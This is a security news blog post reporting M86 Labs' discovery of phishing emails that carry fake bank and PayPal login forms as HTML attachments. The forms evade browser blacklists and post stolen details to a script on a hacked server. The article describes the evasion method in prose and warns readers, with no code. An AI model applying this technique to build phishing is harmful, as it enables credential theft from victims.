Phishing scam in an HTML attachment

M86 Labs has uncovered what appears to be a new phishing trick designed to evade browser-based blacklists.

Rodel Mendrez of M86 writes about it in the company blog, saying that rather than pointing a user to a phishing site, the bad guys are attaching HTML files to the spam messages, which goes undetected by the browsers as a phishing scam.

The forms look like perfectly legitimate documents from Bank of America, Lloyds, TSB and PayPal.

Sign up today.

Get your morning news fix with the daily Salted Hash e-newsletter!

In the case of the PayPal phishing HTML, once a user submits his or her information, it then posts the information through a hacked PHP webserver. In this case, it is a php file that was hosted on fritolay.com.

“In a traditional phishing scam,” he writes, “a phisher usually sets up a website with a fake login form imitating a legitimate online services such as bank, social networking website, auction site or a payment processing service. In an attempt to lure in users, the phisher spams a link to the website through email or instant messaging. Unfortunately for the phishers, modern browsers like Mozilla Firefox and Google Chrome have become quite good at detecting phishing, immediately warning users when a potential phishing site is being opened.”

But, he added, phishers are now evading this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser.

He continues:

The HTML attachment, stored locally, successfully opens in the browser without the user being warned. When the victims enter their information and click the “Agree and Submit” button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate webserver (in one case, Fritolay.com).

The phisher’s PHP script then redirects the browser to Paypal’s homepage after successfully submitting stolen information. While the POST request sends information to the phisher’s remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity. Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective. Logically, however, the browser should be able to detect a URL when the browser sends the POST request. So what makes this type of phishing tactic harder to detect from the browser perspective? Here’s a couple of reasons:

1. Few PHP URLs are reported as abuse. Average users are not able to report any URL because no phishing URL is visible, unless they are technical enough to view the HTML source code.

2. The URLs are hard to verify as phishing sites. The URL alone without the accompanying HTML form would be hard to verify as a phish site because the PHP script runs in the server and no visible HTML is displayed after clicking the submit button, other than redirecting the browser elsewhere to the target brand’s homepage.

We have seen an increase in these types of phishing spam campaigns over the last few months. Last month we blogged about a clever phishing campaign targeting Bank of America online users that uses this same phishing tactic. So be wary of HTML attachments included in an email. If the email seems suspicious, avoid opening the HTML attachment. And if you do happen to open it, be particularly leery of any HTML form requiring you to enter sensitive information.one-stop view of latest business threats. We created it for you! Bookmark it! Use it!

CSO’s Daily Dashboard gives you a

The blog post includes screen shots of what these fake forms look like.

–Bill Brenner